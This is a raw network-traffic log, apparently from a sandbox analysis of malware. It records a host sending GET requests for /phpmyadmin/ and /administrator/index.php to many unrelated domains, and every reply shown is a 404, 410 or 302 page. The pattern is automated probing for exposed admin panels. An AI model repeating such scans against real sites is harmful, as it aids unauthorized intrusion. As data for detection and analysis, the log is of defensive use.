                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.610306978 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.757272005 CET282OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://eremina.net/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.972419024 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:26.972454071 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                73192.168.2.65416764.71.33.3180
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.171986103 CET225OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mcsmk8.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.309021950 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                74192.168.2.65416669.160.38.280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.184701920 CET224OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.341157913 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                75192.168.2.65408781.31.35.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.212459087 CET233OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: evropskypravnik.cz
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.405941963 CET425INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                76192.168.2.6541683.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.220961094 CET228OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.406866074 CET346INHTTP/1.1 410 Gone
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 6c 61 2d 6d 6f 72 61 64 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='0; url=http://la-morada.com/' />a </head>8</html>0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                77192.168.2.6540653.33.130.19080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.420262098 CET228OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.521126032 CET889INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UhKchb64p/5y1xrFMFhEn/fD2C3zaor3UKJGaA+fHWlNe26GXe0NQGWfUOMJVV4gxzxiqAnf54qceNK0kwYVYQ
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.88.246;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.726632118 CET889INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UhKchb64p/5y1xrFMFhEn/fD2C3zaor3UKJGaA+fHWlNe26GXe0NQGWfUOMJVV4gxzxiqAnf54qceNK0kwYVYQ
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.116.88.246;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                78192.168.2.6543323.33.130.19080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.420526028 CET228OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mgnbizlaw.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.708312988 CET890INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UhKchb64p/5y1xrFMFhEn/fD2C3zaor3UKJGaA+fHWlNe26GXe0NQGWfUOMJVV4gxzxiqAnf54qceNK0kwYVYQ
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.119.144.218;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.913105011 CET890INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 142
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Location: https://mgnbizlaw.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UhKchb64p/5y1xrFMFhEn/fD2C3zaor3UKJGaA+fHWlNe26GXe0NQGWfUOMJVV4gxzxiqAnf54qceNK0kwYVYQ
                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=10.119.144.218;Path=/;Max-Age=86400;
